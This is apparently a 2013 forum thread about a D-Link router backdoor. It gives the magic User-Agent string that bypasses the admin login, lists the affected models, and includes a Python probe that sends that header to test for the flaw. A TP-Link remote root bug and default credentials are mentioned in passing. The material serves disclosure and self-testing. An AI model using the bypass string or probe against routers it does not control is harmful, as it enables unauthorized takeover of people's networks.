
Backdoor found in D-Link router

A developer at /DEV/TTYS0 downloaded firmware 1.13 for his DIR-100 revA and decided to reverse engineer it a bit. What he found appears to be a backdoor.

If you change your browser's useragent to "xmlset_roodkcableoj28840ybtide" without the quotes, you can access the web GUI of the router without having to type in a password or username. Basically, if you use a D-Link router's firmware which has this function, anyone can access your network and basically do anything to you (change password on the network and kick you out, redirect you to scam sites, monitor your traffic etc). If you read the user agent backwards it says "JoelBackDoor" so it's obvious that this was put in the firmware on purpose.

It seems like these models are affected:

  • DIR-100
  • DI-524
  • DI-524UP
  • DI-604S
  • DI-604UP
  • DI-604+
  • TM-G5240
  • BRL-04UR
  • BRL-04CW

But there is no telling if other routers have this as well. It's worth noting that this is an old firmware, but what makes me wonder is, why would they add this, and if they used to add it in their old firmwares, are they adding it in their new ones as well?

So, what purpose do you people think this backdoor has, and do you think other manufacturers and/or newer versions of the firmware also have backdoors like this? This is what worried me as soon as I started hearing about the NSA implementing backdoors into closed source software. If the backdoors are exposed, then even your average Joe could potentially wreak havoc on other people's equipment.

 

Source: /DEV/TTYS0


Some TP-Link routers also have a bug (not sure if this one is actually intended to be a backdoor like the D-Link one) which lets you remotely access the router with root privileges by sending a simple HTTP request, which then starts a TFTP transfer from the host computer to the router and executes the file as root.

More info about that here: Sekurak

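As an added worked example (not code from the /DEV/TTYS0 writeup, from D-Link, or from anyone in this thread), here is a small Python probe for the behaviour described in the post: it requests the router's web GUI twice, once with an ordinary User-Agent and once with the magic string, and reports the router as backdoored only if the first request is rejected and the second one gets the admin page. The `mock_router` function is a constructed stand-in for the router's login check so the script runs offline; it assumes HTTP Basic auth with the default admin/password pair mentioned later in the thread and models the backdoor exactly as the post describes. Point `http_transport` at a device you own to test for real.

```python
"""Probe a router's web GUI for the User-Agent backdoor described above.

Added example; the mock router below is a constructed stand-in, not D-Link code.
"""
import base64
import sys
import urllib.error
import urllib.request
from typing import Callable, Dict, Tuple

BACKDOOR_UA = "xmlset_roodkcableoj28840ybtide"   # the magic User-Agent from the post
NORMAL_UA = "Mozilla/5.0 (compatible; backdoor-check)"

Response = Tuple[int, bytes]                      # (HTTP status, body)
Transport = Callable[[Dict[str, str]], Response]  # request headers -> Response


def decode_backdoor_ua(ua: str = BACKDOOR_UA) -> str:
    """Reverse the magic string to show the hidden text inside it."""
    return ua[::-1]


def http_transport(url: str, timeout: float = 5.0) -> Transport:
    """Real transport: one GET against the router's GUI with the given headers.
    urllib raises HTTPError for 401/403, so catch it and return the code."""
    def send(headers: Dict[str, str]) -> Response:
        req = urllib.request.Request(url, headers=headers)
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status, resp.read()
        except urllib.error.HTTPError as err:
            return err.code, err.read()
    return send


def mock_router(vulnerable: bool, admin_password: str = "password") -> Transport:
    """Constructed model of the router's login check (assumption, not real firmware):
    grant access on valid Basic credentials, or, if vulnerable, on the magic UA."""
    expected_auth = "Basic " + base64.b64encode(
        f"admin:{admin_password}".encode()).decode()

    def send(headers: Dict[str, str]) -> Response:
        has_creds = headers.get("Authorization") == expected_auth
        has_magic = vulnerable and headers.get("User-Agent") == BACKDOOR_UA
        if has_creds or has_magic:
            return 200, b"<html><title>D-Link DIR-100 - Setup</title></html>"
        return 401, b"<html><title>401 Unauthorized</title></html>"
    return send


def check_backdoor(send: Transport) -> dict:
    """Two requests: a baseline that must be refused, then the magic UA.
    A GUI that answers 200 to everyone is reported as open, not as backdoored."""
    baseline_status, _ = send({"User-Agent": NORMAL_UA})
    magic_status, _ = send({"User-Agent": BACKDOOR_UA})
    auth_enforced = baseline_status in (401, 403)
    return {
        "baseline_status": baseline_status,
        "backdoor_status": magic_status,
        "auth_enforced": auth_enforced,
        "vulnerable": auth_enforced and magic_status == 200,
    }


if __name__ == "__main__":
    # With a URL argument, probe a real device you own; otherwise run the offline models.
    if len(sys.argv) > 1:
        print(check_backdoor(http_transport(sys.argv[1])))
    else:
        print("magic UA reversed:", decode_backdoor_ua())
        print("vulnerable model :", check_backdoor(mock_router(vulnerable=True)))
        print("patched model    :", check_backdoor(mock_router(vulnerable=False)))
```

The baseline request matters: a device with no authentication at all would also return 200 for the magic string, and the script distinguishes that (reported as `auth_enforced: False`) from the User-Agent bypass the post describes.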

The fact that it's called joelbackdoor makes it look like someone at D-Link decided to try and add a backdoor for their own purposes, without the company knowing. Says something for the people who check the code though if it was only found by someone who tried to reverse engineer their (compiled presumably) code and not their QA team.

HTTP/2 203


There is an app available that lists all routers with such vulnerabilities, which makes it easy to access most routers.

 

If a person is this scared, he can just install Tomato or DD-WRT.

If your grave doesn't say "rest in peace" on it You are automatically drafted into the skeleton war.


Christ, I hope that this was not built into the routers on purpose. tbh I owned one years ago; never been a huge fan of D-Link, they gave me nothing but issues (mine and ones owned by friends of mine). Always been a Netgear person myself, but starting to think that a homemade open firmware one is best tbh.

 

 

A group of embedded device hackers has turned up a vulnerability in D-Link consumer-level devices that provides unauthenticated access to the units' admin interfaces.

 
The flaw means an attacker could take over all of the user-controllable functions of the popular home routers, which includes the DIR-100, DI-524, DI-524UP, DI-604S, DI-604UP, DI-604+ and TM-G5240 units. According to the post on /DEV/TTYS0, a couple of Planex routers are also affected, since they use the same firmware.

 

Source:

http://www.theregister.co.uk/2013/10/13/dlink_routers_have_admin_backdoor/

Never trust a man, who, when left alone with a tea cosey... Doesn't try it on. Billy Connolly
Marriage is a wonderful invention: then again, so is a bicycle repair kit. Billy Connolly
Before you judge a man, walk a mile in his shoes. After that, who cares? He's a mile away and you've got his shoes. Billy Connolly

So this backdoor is way more security breachy than the regular old username: admin - password: password

sysloc


Already posted.

 

Yip, LAwLz beat me to it, the fecker :P

 

https://linustechtips.com/main/topic/65239-backdoor-found-in-d-link-router/


How did they not patch this up? This is unacceptable.

A lot of routers are vulnerable to similar attacks; 2Wire had a big problem with them a while back, and the local exploitation still exists. I have seen business-grade routers vulnerable to simpler attacks that allow full admin access from a locally connected client. The best thing to do is to disable remote access and only manage from internally.

 

Although even disabling the remote management feature is not always enough: https://forums.hak5.org/index.php?/topic/29775-cisco-linksys-ea-series-vulnerability/


I usually install third party software like DD-WRT on routers because the stock firmware is sometimes not very good imo.


About the TP-Link issue, on the website it says "it is WAN exploitable if http admin is available from WAN side". Does this mean that if you have Remote Admin turned off it is not vulnerable?
